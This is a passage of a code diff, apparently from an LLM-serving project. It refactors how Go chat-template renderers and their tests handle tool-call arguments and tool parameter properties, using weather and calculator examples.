Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -436,17 +436,17 @@ Second instruction<|User|>Hello<|Assistant|></think>`,
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Tokyo",
|
"location": "Tokyo",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "New York",
|
"location": "New York",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -489,12 +489,12 @@ Second instruction<|User|>Hello<|Assistant|></think>`,
|
||||||
Description: "Get current weather information",
|
Description: "Get current weather information",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"location": {
|
"location": {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Description: "City name",
|
Description: "City name",
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
Required: []string{"location"},
|
Required: []string{"location"},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -535,12 +535,12 @@ Where:
|
||||||
Description: "Get current weather information",
|
Description: "Get current weather information",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"location": {
|
"location": {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Description: "City name",
|
Description: "City name",
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
Required: []string{"location"},
|
Required: []string{"location"},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -578,9 +578,9 @@ Where:
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -594,12 +594,12 @@ Where:
|
||||||
Description: "Get current weather information",
|
Description: "Get current weather information",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"location": {
|
"location": {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Description: "City name",
|
Description: "City name",
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
Required: []string{"location"},
|
Required: []string{"location"},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -638,9 +638,9 @@ Where:
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -656,12 +656,12 @@ Where:
|
||||||
Description: "Get current weather information",
|
Description: "Get current weather information",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"location": {
|
"location": {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Description: "City name",
|
Description: "City name",
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
Required: []string{"location"},
|
Required: []string{"location"},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -701,9 +701,9 @@ Where:
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Tokyo",
|
"location": "Tokyo",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -724,12 +724,12 @@ Where:
|
||||||
Description: "Get current weather information",
|
Description: "Get current weather information",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"location": {
|
"location": {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Description: "City name",
|
Description: "City name",
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
Required: []string{"location"},
|
Required: []string{"location"},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -770,12 +770,12 @@ Where:
|
||||||
Description: "Get current weather information",
|
Description: "Get current weather information",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"location": {
|
"location": {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Description: "City name",
|
Description: "City name",
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
Required: []string{"location"},
|
Required: []string{"location"},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -787,12 +787,12 @@ Where:
|
||||||
Description: "Perform mathematical calculations",
|
Description: "Perform mathematical calculations",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"expression": {
|
"expression": {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Description: "Mathematical expression to evaluate",
|
Description: "Mathematical expression to evaluate",
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
Required: []string{"expression"},
|
Required: []string{"expression"},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -834,17 +834,17 @@ Where:
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "calculate",
|
Name: "calculate",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"expression": "25 * 4",
|
"expression": "25 * 4",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -860,12 +860,12 @@ Where:
|
||||||
Description: "Get current weather information",
|
Description: "Get current weather information",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"location": {
|
"location": {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Description: "City name",
|
Description: "City name",
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
Required: []string{"location"},
|
Required: []string{"location"},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -877,12 +877,12 @@ Where:
|
||||||
Description: "Perform mathematical calculations",
|
Description: "Perform mathematical calculations",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"expression": {
|
"expression": {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Description: "Mathematical expression to evaluate",
|
Description: "Mathematical expression to evaluate",
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
Required: []string{"expression"},
|
Required: []string{"expression"},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -927,12 +927,12 @@ Where:
|
||||||
Description: "Get current weather information",
|
Description: "Get current weather information",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"location": {
|
"location": {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Description: "City name",
|
Description: "City name",
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
Required: []string{"location"},
|
Required: []string{"location"},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
|
||||||
|
|
@ -136,7 +136,7 @@ func (r *FunctionGemmaRenderer) renderToolDeclaration(tool api.Tool) string {
|
||||||
needsComma := false
|
needsComma := false
|
||||||
|
|
||||||
// Only include properties:{} if there are actual properties
|
// Only include properties:{} if there are actual properties
|
||||||
if len(fn.Parameters.Properties) > 0 {
|
if fn.Parameters.Properties != nil && fn.Parameters.Properties.Len() > 0 {
|
||||||
sb.WriteString("properties:{")
|
sb.WriteString("properties:{")
|
||||||
r.writeProperties(&sb, fn.Parameters.Properties)
|
r.writeProperties(&sb, fn.Parameters.Properties)
|
||||||
sb.WriteString("}")
|
sb.WriteString("}")
|
||||||
|
|
@ -172,16 +172,16 @@ func (r *FunctionGemmaRenderer) renderToolDeclaration(tool api.Tool) string {
|
||||||
return sb.String()
|
return sb.String()
|
||||||
}
|
}
|
||||||
|
|
||||||
func (r *FunctionGemmaRenderer) writeProperties(sb *strings.Builder, props map[string]api.ToolProperty) {
|
func (r *FunctionGemmaRenderer) writeProperties(sb *strings.Builder, props *api.ToolPropertiesMap) {
|
||||||
keys := make([]string, 0, len(props))
|
keys := make([]string, 0, props.Len())
|
||||||
for k := range props {
|
for k := range props.All() {
|
||||||
keys = append(keys, k)
|
keys = append(keys, k)
|
||||||
}
|
}
|
||||||
sort.Strings(keys)
|
sort.Strings(keys)
|
||||||
|
|
||||||
first := true
|
first := true
|
||||||
for _, name := range keys {
|
for _, name := range keys {
|
||||||
prop := props[name]
|
prop, _ := props.Get(name)
|
||||||
if !first {
|
if !first {
|
||||||
sb.WriteString(",")
|
sb.WriteString(",")
|
||||||
}
|
}
|
||||||
|
|
@ -203,15 +203,15 @@ func (r *FunctionGemmaRenderer) formatToolCall(tc api.ToolCall) string {
|
||||||
var sb strings.Builder
|
var sb strings.Builder
|
||||||
sb.WriteString("<start_function_call>call:" + tc.Function.Name + "{")
|
sb.WriteString("<start_function_call>call:" + tc.Function.Name + "{")
|
||||||
|
|
||||||
keys := make([]string, 0, len(tc.Function.Arguments))
|
keys := make([]string, 0, tc.Function.Arguments.Len())
|
||||||
for k := range tc.Function.Arguments {
|
for k := range tc.Function.Arguments.All() {
|
||||||
keys = append(keys, k)
|
keys = append(keys, k)
|
||||||
}
|
}
|
||||||
sort.Strings(keys)
|
sort.Strings(keys)
|
||||||
|
|
||||||
first := true
|
first := true
|
||||||
for _, key := range keys {
|
for _, key := range keys {
|
||||||
value := tc.Function.Arguments[key]
|
value, _ := tc.Function.Arguments.Get(key)
|
||||||
if !first {
|
if !first {
|
||||||
sb.WriteString(",")
|
sb.WriteString(",")
|
||||||
}
|
}
|
||||||
|
|
|
||||||
|
|
@ -51,9 +51,9 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
||||||
Description: "Get weather",
|
Description: "Get weather",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"city": {Type: api.PropertyType{"string"}, Description: "City"},
|
"city": {Type: api.PropertyType{"string"}, Description: "City"},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -75,9 +75,9 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
||||||
Description: "Get weather",
|
Description: "Get weather",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"city": {Type: api.PropertyType{"string"}, Description: "City"},
|
"city": {Type: api.PropertyType{"string"}, Description: "City"},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -107,9 +107,9 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
||||||
Description: "Get weather",
|
Description: "Get weather",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"city": {Type: api.PropertyType{"string"}, Description: "City"},
|
"city": {Type: api.PropertyType{"string"}, Description: "City"},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -126,7 +126,7 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{"city": "Paris"},
|
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -141,9 +141,9 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
||||||
Description: "Get weather",
|
Description: "Get weather",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"city": {Type: api.PropertyType{"string"}, Description: "City"},
|
"city": {Type: api.PropertyType{"string"}, Description: "City"},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -161,7 +161,7 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{"city": "Paris"},
|
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -176,9 +176,9 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
||||||
Description: "Get weather",
|
Description: "Get weather",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"city": {Type: api.PropertyType{"string"}, Description: "City"},
|
"city": {Type: api.PropertyType{"string"}, Description: "City"},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -195,7 +195,7 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "add",
|
Name: "add",
|
||||||
Arguments: api.ToolCallFunctionArguments{"a": float64(1), "b": float64(2)},
|
Arguments: testArgs(map[string]any{"a": float64(1), "b": float64(2)}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -210,10 +210,10 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
||||||
Description: "Add numbers",
|
Description: "Add numbers",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"a": {Type: api.PropertyType{"number"}},
|
"a": {Type: api.PropertyType{"number"}},
|
||||||
"b": {Type: api.PropertyType{"number"}},
|
"b": {Type: api.PropertyType{"number"}},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -239,10 +239,10 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Required: []string{"city"},
|
Required: []string{"city"},
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"city": {Type: api.PropertyType{"string"}, Description: "City Name"},
|
"city": {Type: api.PropertyType{"string"}, Description: "City Name"},
|
||||||
"country": {Type: api.PropertyType{"string"}, Description: "Country Name"},
|
"country": {Type: api.PropertyType{"string"}, Description: "Country Name"},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -263,9 +263,9 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
||||||
Description: "Get weather",
|
Description: "Get weather",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"city": {Type: api.PropertyType{"string"}, Description: "City"},
|
"city": {Type: api.PropertyType{"string"}, Description: "City"},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -276,9 +276,9 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
||||||
Description: "Get current time",
|
Description: "Get current time",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"timezone": {Type: api.PropertyType{"string"}, Description: "Timezone"},
|
"timezone": {Type: api.PropertyType{"string"}, Description: "Timezone"},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -296,13 +296,13 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{"city": "Paris"},
|
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_time",
|
Name: "get_time",
|
||||||
Arguments: api.ToolCallFunctionArguments{"timezone": "UTC"},
|
Arguments: testArgs(map[string]any{"timezone": "UTC"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -318,9 +318,9 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
||||||
Description: "Get weather",
|
Description: "Get weather",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"city": {Type: api.PropertyType{"string"}, Description: "City"},
|
"city": {Type: api.PropertyType{"string"}, Description: "City"},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -331,9 +331,9 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
||||||
Description: "Get current time",
|
Description: "Get current time",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"timezone": {Type: api.PropertyType{"string"}, Description: "Timezone"},
|
"timezone": {Type: api.PropertyType{"string"}, Description: "Timezone"},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -351,7 +351,7 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{"city": "Paris"},
|
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -367,9 +367,9 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
||||||
Description: "Get weather",
|
Description: "Get weather",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"city": {Type: api.PropertyType{"string"}, Description: "City"},
|
"city": {Type: api.PropertyType{"string"}, Description: "City"},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -391,7 +391,7 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
||||||
Description: "",
|
Description: "",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{},
|
Properties: testPropsMap(map[string]api.ToolProperty{}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -430,7 +430,7 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "set_flag",
|
Name: "set_flag",
|
||||||
Arguments: api.ToolCallFunctionArguments{"enabled": true},
|
Arguments: testArgs(map[string]any{"enabled": true}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -445,9 +445,9 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
||||||
Description: "Set a flag",
|
Description: "Set a flag",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"enabled": {Type: api.PropertyType{"boolean"}, Description: "Flag value"},
|
"enabled": {Type: api.PropertyType{"boolean"}, Description: "Flag value"},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -468,11 +468,11 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Required: []string{"a", "b", "c"},
|
Required: []string{"a", "b", "c"},
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"a": {Type: api.PropertyType{"string"}, Description: "A"},
|
"a": {Type: api.PropertyType{"string"}, Description: "A"},
|
||||||
"b": {Type: api.PropertyType{"string"}, Description: "B"},
|
"b": {Type: api.PropertyType{"string"}, Description: "B"},
|
||||||
"c": {Type: api.PropertyType{"string"}, Description: "C"},
|
"c": {Type: api.PropertyType{"string"}, Description: "C"},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -492,9 +492,9 @@ func TestFunctionGemmaRenderer(t *testing.T) {
|
||||||
Description: "Test",
|
Description: "Test",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"items": {Type: api.PropertyType{"array"}, Description: "List of items"},
|
"items": {Type: api.PropertyType{"array"}, Description: "List of items"},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
|
||||||
|
|
@ -114,7 +114,7 @@ func (r *Nemotron3NanoRenderer) renderTools(tools []api.Tool) string {
|
||||||
|
|
||||||
sb.WriteString("\n<parameters>")
|
sb.WriteString("\n<parameters>")
|
||||||
if fn.Parameters.Properties != nil {
|
if fn.Parameters.Properties != nil {
|
||||||
for paramName, paramFields := range fn.Parameters.Properties {
|
for paramName, paramFields := range fn.Parameters.Properties.All() {
|
||||||
sb.WriteString("\n<parameter>")
|
sb.WriteString("\n<parameter>")
|
||||||
sb.WriteString("\n<name>" + paramName + "</name>")
|
sb.WriteString("\n<name>" + paramName + "</name>")
|
||||||
|
|
||||||
|
|
@ -202,7 +202,7 @@ func (r *Nemotron3NanoRenderer) formatContent(content string, truncate bool, add
|
||||||
func (r *Nemotron3NanoRenderer) writeToolCalls(sb *strings.Builder, toolCalls []api.ToolCall) {
|
func (r *Nemotron3NanoRenderer) writeToolCalls(sb *strings.Builder, toolCalls []api.ToolCall) {
|
||||||
for _, tc := range toolCalls {
|
for _, tc := range toolCalls {
|
||||||
sb.WriteString("<tool_call>\n<function=" + tc.Function.Name + ">\n")
|
sb.WriteString("<tool_call>\n<function=" + tc.Function.Name + ">\n")
|
||||||
for name, value := range tc.Function.Arguments {
|
for name, value := range tc.Function.Arguments.All() {
|
||||||
sb.WriteString("<parameter=" + name + ">\n" + r.formatArgValue(value) + "\n</parameter>\n")
|
sb.WriteString("<parameter=" + name + ">\n" + r.formatArgValue(value) + "\n</parameter>\n")
|
||||||
}
|
}
|
||||||
sb.WriteString("</function>\n</tool_call>\n")
|
sb.WriteString("</function>\n</tool_call>\n")
|
||||||
|
|
|
||||||
|
|
@ -75,9 +75,9 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Required: []string{"city"},
|
Required: []string{"city"},
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"city": {Type: api.PropertyType{"string"}, Description: "The city name"},
|
"city": {Type: api.PropertyType{"string"}, Description: "The city name"},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -113,7 +113,7 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: map[string]any{"city": "Paris"},
|
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -129,9 +129,9 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Required: []string{"city"},
|
Required: []string{"city"},
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"city": {Type: api.PropertyType{"string"}, Description: "The city name"},
|
"city": {Type: api.PropertyType{"string"}, Description: "The city name"},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -171,7 +171,7 @@ func TestNemotron3NanoRenderer(t *testing.T) {
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
